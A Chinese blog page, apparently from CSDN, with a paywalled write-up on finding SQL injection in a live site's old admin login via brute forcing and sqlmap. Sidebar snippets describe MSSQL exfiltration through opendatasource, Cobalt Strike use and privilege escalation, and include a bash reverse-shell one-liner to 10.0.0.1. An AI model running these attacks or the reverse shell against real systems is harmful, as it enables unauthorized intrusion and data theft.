记一次实战MSSQL注入

最新推荐文章于 2022-06-21 15:03:29 发布
最新推荐文章于 2022-06-21 15:03:29 发布
阅读量371 收藏
点赞数
分类专栏: web渗透测试 文章标签: 安全 数据库 信息安全 mysql shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51803069/article/details/111338802
版权

信息收集:
先利用goby做一个简单的资产探测
在这里插入图片描述
放开了三个web端口,其中一个为后台登录框,无验证码。
我面对登录框一般思路:
1.暴力破解
2.万能密码
3.测试是否存在xss
4.测试sql注入
5.查看网页源代码、js文件是否存在泄露用户密码

我这里先用burp尝试暴力破解,尝尝我大字典的威力!
利用暴力破解的时间,看着登录框非常老旧测试一波sql注入,直接抓包上sqlmap,不测不知道一测吓一跳!
在这里插入图片描述
赶紧看下权限

最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows烂土豆提权复现(MS16-075)
oiadkt的博客
03-08 2054
Windows烂土豆提权复现(MS16-075)
MSSQL注入 — 反弹注入
qq_58000413的博客
09-21 686
database=hacker数据库名 ').数据库名.dbo.表名 select *(被攻击网站的字段,通过order by已经判断出来了) from admin。database=数据库名 ').数据库名.dbo.字段 (字段可以多个,逗号隔开)反弹注入原理,将目标的数据全部反弹到自己构造的数据库中,opendatasource就是连接自己数据库用的(select * from syscolumns where id='前面查到的id值'
反弹shell的几种方法
stonesharp的专栏
04-13 4246
bash版本: ? 1 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1   ,注意某些linux不支持   perl版本:   ? 1 2 3 4 5 pe
MSSQL反弹注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-17 497
MSSSQL注入——反弹注入 我们首先先回顾一下MSSQL普通的显错注入(毕竟MSSQL显错注入和MYSQL不太一样) 我这里还是联合传为例子,首先猜字段,然后联合查询,住要写union all,然后猜输出点,要使用NULL去填充,注释只有 – + select name from dbo.sysdatabases 查询系统库 sysobjects 查询系统表 (xtype=‘U’) syscolumns 字段 (id= ) 指定sysobjects库中表名对应id 先尝试显错注入 ‘ and o
一次对真实网站的SQL注入实战
qq_43678263的博客
03-31 4974
一次对真实网站的SQL注入实战前言发现过程漏洞利用总结 前言 某集团股份有限公司网站存在SQL注入漏洞 发现过程 用针对性工具扫描(这里使用的是超级SQL注入工具)问题网站,得到以下链接均存在SQL注入漏洞 问题URL: fuwu_fanwei.php?fid=1 fuwu_zhichi.php?zid=5 video.php?video_id=1 news.php?nid=1 about.php?aid=1 fuwu_fanwei_content.php?fid=1&id=1 漏洞利用 这里使
mssql,mysqll注入语法.zip_KMF_security_提权
09-24
2. **mssql注入**:在Microsoft SQL Server环境中,攻击者可能会利用T-SQL(Transact-SQL)语句进行注入,例如通过执行系统存储过程来获取敏感信息或提升权限。 3. **mysql注入**:在MySQL系统中,注入攻击可能涉及...
PHP+H5+MSSQL拍照多图上传(前后端)
10-16
【PHP+H5+MSSQL拍照多图上传(前后端)】是一个综合性的技术实践,涉及到了Web开发中的多个重要环节。这个项目的核心在于实现用户...总的来说,这是一个涵盖了多种技术的综合性实战案例,对于提升Web开发技能大有裨益。
SQL注入检测
12-28
SQL注入是一种常见的网络安全威胁,发生在应用系统处理用户输入数据时,未进行充分验证或过滤,导致恶意构造的SQL语句能够被执行,从而获取、修改、删除数据库中的敏感信息。在软件测试,特别是安全性测试中,SQL...
JSP简单网上订餐系统(MSSQL)Java源码
07-22
【标题】"JSP简单网上订餐系统(MSSQL)Java源码"是一个基于Java技术和MSSQL数据库实现的在线订餐系统。这个项目旨在提供一个基础的平台,让用户能够方便地浏览菜单,选择菜品,并完成订单提交。通过学习和分析这个...
sql注入源码(mssql,mysql)
03-15
支持mssql,mysql,列数据库,文件目录,注册表等
powershell cs上线_从SQL注入到Cobalt Strike上线
weixin_39550410的博客
11-21 1085
介绍在这篇文章中,我将指导您如何在SQL注入中使用XP_CMDSHELL上线Cobalt Strike。为了解决这个问题,我们首先需要设置一个工作环境为此,我们将使用安装了HACKME Bank的windowsserver2003。请参考这引导你开始跑步。一旦您成功地在WindowsServer2003虚拟机上安装了HackMeBank,您将需要安装一些附加的服务包,以便在该计算机上运行...
Cobalt Strike 从入门到入狱(三)
swordheart的博客
06-21 1331
1.对被控主机的操作 对着被控主机右键后: Interact //打开beacon Access dump hashes //获取hash Elevate //提权 Golden Ticket //生成黄金票据注入当前会话 MAke token //凭证转换 Run Mimikatz //运行 Mimikatz Spawn As //用其他用户生成Cobalt......
getshellsql注入os-shell
MoCoCN的博客
12-10 1962
@MoCo菜弟弟一次从普通用户弱口令到sql注入shell 0x00 前言 这段时间一直在挖edu,挖到一个从普通用户权限到getshell的站,觉得挺有意义的,录了一下,也学到了挺多知识的,但中间出现了写小插曲,有个地方没搞好,没弄明白,就一直没发文章,最近通过某不知名大佬的帮助下已经弄懂了,所以前来发个文章。 这几天公司没什么活,主要是公司CNVD和CNNVD的资质,就是无限的刷洞,上周末领导发了句这个,我感觉是对我们这个交洞数量有点不满。 该说不说,该做不做的,领导既然都说那了必须得安排啊
烂土豆ms16-075提权
orange777
02-23 1131
环境信息 目标机: server2008 192.168.111.4 攻击机: kali 192.168.111.3 目标上线 首先通过制作html后门使目标机上线 可以发现当前目标机用户为administrator 通过当前会话框执行shell systeminfo查看当前系统信息,打补丁情况 把该信息粘贴到http://bugs.hacking8.com/tiquan/查看可以利用的漏洞 在GitHub上查找对应cs里烂土豆的插件,加载到cs中 https://github.com
web安全学习-sql注入-针对mssql(sqlserver)的攻击
Shanfenglan's blog
03-26 1275
文章目录0x00 前言0x01 mssql环境下需要了解的几个特性1. iis特性1.1 %特性(ASP+IIS)1.2 %u特性(asp+iis和aspx+iis)1.3 另类%u特性(ASP+IIS)2. mssql特性1. 空白字符2. 注释符3. 特殊数值4. 运算符0x02 测试过程0x03 自动化生成bypass_payload脚本编写总结参考文章 0x00 前言 mssql一般的环境是iis+asp或iis+aspx,我们先了解一下mssql的特性。 0x01 mssql环境下需要了解的几个
一次另类的mssql渗透之路
include_voidmain的博客
06-08 492
一次另类的mssql渗透之路
MSSQL注入--反弹注入
weixin_30873847的博客
06-25 580
明明是sql注入的点,却无法进行注入,注射工具拆解的速度异常的缓慢,错误提示信息关闭,无法返回注入的结果,这个时候你便可以尝试使用反弹注入, 反弹注入需要依赖于函数opendatasource的支持,将当前数据库中的查询结果发送到另一数据库服务器中。 判断数据库类型 and exists (select * from sysobjects)--返回正常为mssql(也名sql serve...
mssql注入mysql注入的区别
最新发布
05-31
MSSQL注入MySQL注入都是利用Web应用程序的漏洞来实现未经授权的访问数据库的攻击方式,它们之间的区别在于: 1.语法不同:MSSQL和MySQL在语法上有很大的不同,因此在进行注入时需要使用不同的SQL语句。 2.数据...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值